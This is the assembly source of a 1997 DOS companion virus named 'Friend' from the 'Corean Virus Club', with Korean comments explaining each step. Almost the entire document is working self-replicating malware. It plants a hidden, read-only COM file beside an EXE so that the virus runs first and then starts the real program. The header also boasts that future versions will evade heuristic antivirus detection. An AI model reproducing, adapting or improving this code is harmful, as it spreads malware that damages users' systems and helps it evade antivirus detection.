;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
;                                                               CVC #02  97/09
; Virus Name : Friend (Type A)
;
; Author : Osiris of CVC,Corea
; Date : 1997/09/05
;
; Type : Non-resident Companion
;
; 비상주 Companion 바이러스이다. 한국산 최초로 자체제작된 산란형 바이러스이다.
; 현재 디렉토리에서 1 개의 EXE 파일을 찾아 동일 파일명 COM 파일을 생성해둔다.
; 원래 EXE 파일을 수정하지 않으므로 에러가 날 가능성은 거의 없다.
;
; 치료는 생성된 COM 파일만 삭제하면 된다.
;
; 예전에 짜봤던 산란형 과는 많이 틀리다.
; 역시 인공지능 검색에 진단이 되긴 하지만, 앞으로 개량되는 버전은 인공지능검색
; 에도 진단이 안될 것이다.
;
; 항상 첫작품은 실험용이다.
;
;
;
;
;
;
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

            .MODEL  TINY
            .CODE

 PARASIZE   EQU  (End_Memory-Friend+0Fh) SHR 4 + 13h

            org   100h

 Friend:
            mov   ah,2fh                    ; DTA 구하기
            int   21h
            push  es                        ; DTA 값 저장
            push  bx

            mov   ah,1ah                    ; 새로운 DTA 설정
            mov   dx, offset NewDTA
            int   21h

            mov   ah,4Eh                    ; EXE 파일 찾기
            mov   cx,00100011B              ; 읽기전용/숨김파일
            mov   dx, offset Mask_EXE       ;
 Find_repeat:
            int   21h                       ;
            jc    Execute_EXE               ; 감염 시킬 파일이 없으면 EXE 실행

 Infect_EXE:
            mov   si, offset NewDTA + 1Eh   ;
            call  ChgExt                    ; EXE -> COM,COM -> EXE

            mov   ax, 4300h                 ; 감염 여부 확인
            mov   dx, offset NewDTA + 1Eh   ; (COM 파일이 존재 하는가?)
            int   21h
            jc    Drop_COM                  ; 속성 찾을 수 있으면 감염 된것임

            mov   ah, 4Fh                   ; 다음 파일 찾기
            jmp   Find_repeat

 Drop_COM:
            mov   ah, 3ch                   ; COM 파일 생성
            mov   cx, 00000011B             ; 읽기만 가능/숨김
            mov   dx, offset NewDTA + 1Eh
            int   21h

            xchg  ax,bx                     ; 핸들 얻기

            mov   ah, 40h                   ; 바이러스 쓰기
            mov   cx, offset End_virus - 100h
            mov   dx, 100h
            int   21h

            mov   ah, 3eh                   ; 파일 닫기
            int   21h

 Execute_EXE:
            pop   dx                        ; 원래 DTA 복구
            pop   ds
            mov   ah,1ah
            int   21h

            mov   sp, offset End_Memory     ; 스택 조정

            mov   ah,4ah                    ; 메모리 조정
            mov   bx, PARASIZE
            int   21h

            call  Set_env                   ; 원래 EXE 파일 실행을 위한 환경
                                            ; 영역 설정

            mov   si, offset Filename
            call  ChgExt                    ; 확장자 변경

            mov   ax,4b00h                  ; 원래 EXE 파일 실행
            mov   bx, offset Env_Block
            mov   dx, offset Filename
            int   21h

            mov   ah,4dh                    ; 리턴값 얻기
            int   21h
 Stop_virus:
            mov   ax, 4c00h                 ; 바이러스 끝내기
            int   21h

;
; 확장자 바꾸기 (EXE -> COM, COM -> EXE)
; 입력 SI = 바꾸고자 하는 확장자

 ChgExt     proc  near                      ; 확장자 바꾸기

 Loop_Eof:
            lodsb
            or    al,al
            jnz   Loop_Eof

            mov   di,si
            sub   di,4                      ; DI = 확장자 위치
            mov   si, offset Ext_COM        ; SI = COM

            cmp   byte ptr [di],'E'         ; EXE 파일 인가 ?
            jz    mov_ext
            add   si,0005                   ; SI = EXE
 mov_ext:
            mov   cx,0003
            repz  movsb                     ; 확장자가 COM 이면 EXE 로
                                            ; EXE 이면 COM 으로 바꾼다.
            ret
 ChgExt     Endp


; 환영영역에서 재실행에 필요한 정보 얻기
;
;
 Set_Env    proc

            mov   PSP1,es
            mov   PSP2,es
            mov   PSP3,es

 Search_RD:                                 ; 다시 실행하기 위해서 필요한 값들을 알아낸다.
            xor   si,si
            mov   ds,ds:[002Ch]             ; 실행시킨 파일의 이름을 알아낸다.

 Search_RD_LOOP:
            cmp   word ptr DS:[SI],0000     ; 파일이름전에는 0000이다.
            jz    Get_FileName              ; PSP:[002Ch] --> 세그먼트
            inc   si
            jmp   Search_RD_LOOP

 Get_FileName:
            add   si,0004
            mov   dx,si                     ; 현재 실행되는 파일이름

            mov   di, offset Filename
            mov   cx,0080
            repz  movsb

            push  cs                        ;
            pop   ds
            RET

 Set_env    endp

            db    '[Friend] The first Corean Companion virus..'
            db    '(c) 1997/09 Osiris of CVC (Corean Virus Club),Corea'

; 재실행을 위한 블럭
 ENV_BLOCK  dw    ?                         ; 재실행용 블럭
            dw    80h                       ;
 PSP1       dw    ?
            dw    5ch                       ;
 PSP2       dw    ?
            dw    6ch                       ;
 PSP3       dw    ?

 Ext_COM    db    'COM'                     ; 확장자 COM
 Mask_EXE   db    '*.EXE',00                ; 확장자 EXE

 End_Virus:

 Filename   db    85  dup (0)               ; 파일 이름
 NewDTA     db    50  dup (0)               ; DTA
            db    100 dup (0)               ; 스택
 End_Memory:

            END   Friend

